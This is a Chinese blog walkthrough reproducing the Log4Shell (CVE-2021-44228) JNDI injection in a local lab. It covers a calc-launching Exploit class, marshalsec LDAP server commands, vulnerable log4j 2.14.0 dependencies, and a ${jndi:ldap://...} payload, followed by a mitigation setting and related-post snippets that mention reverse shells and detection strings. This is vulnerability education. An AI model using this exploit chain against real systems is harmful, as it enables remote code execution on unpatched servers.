apache Log4j2漏洞复现(CVE-2021-44228)

已于 2023-06-18 12:03:27 修改
阅读量97 收藏
点赞数 1
文章标签: log4j apache
于 2023-06-08 16:49:31 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_55641973/article/details/131042867
版权

浅浅了解一下log4j。

        log4j是apache著名的开源日志框架,log4j是log4j2的前身。Log4j主要由 Loggers (日志记录器)、Appenders(输出控制器) 和 Layout(日志格式化器) 组成。其中 Loggers 控制日志的输出以及输出级别;Appenders 指定日志的输出方式(输出到控制台、文件等);Layout 控制日志信息的输出格式。

        JNDI是Java Naming and Directory Interface(JAVA命名和目录接口)的英文简写,它是为JAVA应用程序提供命名和目录访问服务的API(Application Programing Interface,应用程序编程接口)。

             JNDI主要由JNDI API 和JNDI SPI两部分组成。

             Java应用程序通过JNDI API访问目录服务。

             JNDI API会调用Naming Manager实例化JNDI SPI。

            调用JNDI的API应用程序可以定位资源和其他程序对象。

            JNDI可访问的现有的目录及服务有:JDBC、LDAP、RMI、DNS、NIS、CORBA 。

        RMI(Remote Method Invocation)为远程方法调用,是允许运行在一个Java虚拟机的对象调用运行在另一个Java虚拟机上的对象的方法。

        漏洞形成的原因:log4j引入jndi的原因,可以更方便地获取一些可打印的对象进行日志统计 。 所以log4j支持的${jndi:xxxx},支持jndi进行lookup来寻找对象并打印。

回归正题:

Log4j2漏洞复现(CVE-2021-44228)

影响范围:Apache Log4j 2.x <= 2.15.0。

远程代码:

Exploit.java

import java.io.IOException;
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }

        }
    }

编译成class文件(Open in——>Explorer),上传到PHPstudy 的/www目录下。

准备一个LDAP服务器。

首先我们使用java 开源项目marshalsec,,快速搭建jndi相关server,ldap,rmi。

链接:https://pan.baidu.com/s/18bgwtishw0tP_7ZnDWaJ3w
提取码:1111

需要安装maven依赖

链接:https://pan.baidu.com/s/18siTyeZX5C_OsoDM8-Binw
提取码:1111

配置环境变量:

 

编译:

进入到marshalsec文件夹输入如下命令:

mvn clean package -DskipTests
mvn "-Dmaven.test.skip=true" -P

在启动LDAP服务器之前需要一个http服务器(此处是小皮面板phpstudy):

 管理打开根目录:

在根目录中上传一个Exploit.class文件。

Exploit.class由Exploit.java编译而来。

import java.io.IOException;
public class Exploit {
    static {
        try {
            Runtime.getRuntime().exec("calc");
        } catch (IOException e) {
            e.printStackTrace();
        }

        }
    }

如何编译:在编译文件的当前目录右键打开

将.class文件复制到phpstudy的根目录.

启动小皮面板:

 

启动LDAP服务器:

 java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:80/test/#Exploit 1389

http://127.0.0.1:80 指http服务地址,Exploit代表Exploit.class文件 ,1389 指ldap服务的端口.

可以在这里修改LDAP端口号。

建立LDAP的客户端:

注意java Version 8与JDK一致,管理工具Maven.

在pom.xml中添加log4j依赖。

 <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.0</version>
        </dependency>

        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.0</version>
        </dependency>

建立log4j.java

import org.apache.logging.log4j.Logger;
import org.apache.logging.log4j.LogManager;

public class log4j {
    private static final Logger logger = LogManager.getLogger(log4j.class);

    public static void main(String[] args) {
        logger.error("${java.os}");
        logger.error("${jndi:ldap://127.0.0.1:1389/test}");
    }
}

 运行

复现成功:

以下我是配置IDEA中出现的问题:

关键在

Project bytecode version 选择与JDK对应的版本。还有Moudle中的版本。先Apply——>ok.

同理:

补救措施:

log4j2.formatMsgNoLookups=true按照官方api解释说明,当这个值为true时,就不执行lookup。

 

神仙鱼~
关注
log4j漏洞复现(CVE-2021-44228)
qq_32445755的博客
01-13 565
Log4j 是一款开源 Java 日志记录工具。Log4j 2 是对 Log4j 的重大升级,此次漏洞的出现,正是由用于 Log4j 2 提供的 lookup 功能造成的,该功能允许开发者通过一些协议去读取相应环境中的配置。但在实现的过程中,并未对输入进行严格的判断,从而造成漏洞的发生。
log4j 漏洞CVE-2021-44228 漏洞复现
kyliuw的博客
03-08 6099
log4j 漏洞CVE-2021-44228 漏洞复现
Apache log4j2远程代码执行漏洞复现
世间繁华梦一出
12-11 9901
Apache log4j2 远程代码执行漏洞复现漏洞描述漏洞影响范围漏洞复现步骤:深度利用——反弹shell防御措施 漏洞描述 Apache Log4j2是一个基于Java的日志记录工具。该工具重写了Log4j框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过该漏洞构造特殊的请求包,最终出发远程代码执行。该漏洞实际上是组件解析缺陷导致的。 漏洞影响范围 2.0 <= Apache
Apache log4j2漏洞复现
unlash的博客
09-16 232
vulhub靶场log4j2漏洞复现,全网最详细过程 CVE-2021-44228漏洞复现 log4j2漏洞原理,修复建议
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现
heike_Ch的博客
08-14 1203
log4j22021年底爆出的非常严重的漏洞,可谓是风靡一时,“血洗互联网”,也是安全公司面试的常见题目,我们应该了解这个漏洞的原理及利用方式。如何排查是否受到了攻击?检查日志中是否存在"jndi:ldap://"、"jndi:rmi//"等字符来发现可能的攻击行为,前面复现的过程在payload的构造中都出现了这样的字符串,这是攻击的典型标志。如何对log4j2的攻击进行防御?1.设置log4j2.formatMsgNoLookups=True。
Apache Log4j2漏洞复现
Adminxe的博客
12-23 1664
0x00 前言 作者:Moco 慢慢的距离上次写文章已过去了377天,这一年发生了好多好多的事,经历了好多好多的变故,或喜或悲、或分或合、起起落落,整整的一年了得,没怎么好好学习,没怎么认真的钻研技术,对自己表示很抱歉,违背了“白帽守则”,让我们重温一下“白帽守则”: 白帽守则第一页第一条,心中无女人,挖洞自然神。 白帽守则第一页第二条,只有不努力的白帽,没有挖不到的漏洞 对此我深表歉意、望大家以我为戒,踏踏实实的深入贯彻落实“白帽守则”,切实维护祖国网络空间安全。 0x01 漏洞描述 A..
vCenter修复Apache log4j2漏洞CVE-2021-44228, CVE-2021-45046)
qq_27248929的博客
12-21 4619
2021年12月Apache log4j远程执行漏洞影响到的VMware产品列表:VMSA-2021-0028.4 (vmware.com)。 本次我们所涉及到的产品及版本是vSphere6.7下的vCenter Server Application6.7.x,以下是加固的配置步骤: 1)首先打开vCenter的shell连接,需从控制台进入vCenter虚机进行配置操作,具体为进入排错模式,Enable shell和SSH选项; 2)打开xshell 通过SSH连接vCenter进行命令行.
Log4j2远程代码执行漏洞复现(cve-2021-44228)
热门推荐
weixin_47179815的博客
07-12 1万+
Log4j2远程代码执行漏洞(cve-2021-44228)复现笔记内容Apache log4jApache的一个开源项目,Apache log4j 2是一个就Java的日志记录工具。通过重写了log4j框架,并且引入了大量丰富的特性,可以控制日志信息输送的目的地为控制台、文件、GUI组建等,被应用于业务系统开发,用于记录程序输入输出日志信息。log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。JNDI简单介绍JNDI(Java Na
Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
siu~
10-31 568
Apache Log4j2 是一个基于 Java 的日志记录工具。该工具重写了 Log4j 框架,并且引入了大量丰富的特性。该日志框架被大量用于业务系统开发,用来记录日志信息。 在大多数情况下,开发者可能会将用户输入导致的错误信息写入日志中。攻击者利用此特性可通过 该漏洞构造特殊的数据请求包,最终触发远程代码执行。
Apache Log4j2远程代码执行漏洞CVE-2021-44228漏洞复现
weixin_51804748的博客
03-18 6985
这里写自定义目录标题欢迎使用Markdown编辑器新的改变功能快捷键合理的创建标题,有助于目录的生成如何改变文本的样式插入链接与图片如何插入一段漂亮的代码片生成一个适合你的列表创建一个表格设定内容居中、居左、居右SmartyPants创建一个自定义列表如何创建一个注脚注释也是必不可少的KaTeX数学公式新的甘特图功能,丰富你的文章UML 图表FLowchart流程图导出与导入导出导入 欢迎使用Markdown编辑器 你好! 这是你第一次使用 Markdown编辑器 所展示的欢迎页。如果你想学习如何使用Mar
Apache Log4j2历史漏洞复现
懂进攻知防守
07-30 1758
Apache Log4j2漏洞简介: log4j2中存在JNDI注入漏洞,当程序记录用户输入的数据时,即可触发该漏洞。成功利用该漏洞可在目标服务器上执行任意代码。
Apache Log4j2 RCE漏洞复现
huangyongkang666的博客
04-13 2029
Apache Log4j2 RCE漏洞复现 1.漏洞介绍 Apache Log4j2是一个Java的日志组件,在特定的版本中由于其启用了lookup功能,从而导致产生远程代码执行漏洞。 影响版本:Apache Log4j 2.x<=2.15.0.rc1 漏洞编号:CVE-2021-44228 2.漏洞环境搭建 目标:Ubuntu ip: 192.168.241.129 攻击机 :kail ip: 192.168.241.128 由于我的Ubuntu虚拟机已经搭建过docker,直接用以下命令
Apache Log4j2 远程代码执行漏洞复现
renyizou的博客
03-06 5077
靶场: Vulfocus 靶场环境 目前 Vulfocus 已经集成 Log4j2 环境,可通过以下链接启动环境测试:http://vulfocus.fofa.so/#/dashboard?image_id=3b8f15eb-7bd9-49b2-a69e-541f89c4216c 也可通过 docker pull vulfocus/log4j2-rce-2021-12-09:latest 拉取本地环境运行。 漏洞复现: 我是本地复现: 环境: *服务器地址:kali ip(192.168.30.1
Apache Log4j2 远程代码执行漏洞复现 (CVE-2021-44228)
qq_44433172的博客
06-24 1288
Apache Log4j 远程代码执行漏洞 (CVE-2021-44228)
Apache Log4j2漏洞 (CVE-2021-44228) 分析与复现
未完成的歌~的博客
03-15 1万+
Apache Log4j2 是一个开源的 Java 日志记录工具。Log4j2Log4j 的升级版本,其优异的性能被广泛的应用于各种常见的 Web 服务中。Log4j2 在特定的版本中由于启用了 lookup 功能,导致存在 JNDI 漏洞。lookup 函数是用于在日志消息中替换变量的函数,是通过配置文件中的${}语法调用的,例如:如果在日志消息中使用了,那么 log4j2 将使用 lookup 函数从系统属性中查找名为 “my.property” 的属性值,并将其替换为实际值。
log4j2漏洞复现
qq_45396375的博客
12-26 506
如果攻击者通过构造一个恶意的rmi或ldap服务,使Log4j通过JNDI加载远程恶意资源,就可能导致攻击者在目标系统上执行任意代码。补充:攻击机的jdk版本如果太高可能会不成功,如果攻击机选择使用kali,kali里的jdk版本太高,rmi协议可能不成功,可以换ldap协议试一下。JNDI注入工具下载地址:https://github.com/welk1n/JNDI-Injection-Exploit。靶机为自己写的一个springboot demo。将项目打包成一个jar包,上传至一台服务器。
Apache Log4j2远程代码执行漏洞(CVE-2021-45105/CVE-2021-44228)、
最新发布
08-22
CVE-2021-45105和CVE-2021-44228是针对该框架的一个严重安全漏洞,也被称为Log4Shell或Log4J RCE(Remote Code Execution)。这个漏洞源于Log4j库的一个设计缺陷,当处理某些特定类型的外部输入数据时,攻击者可以...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值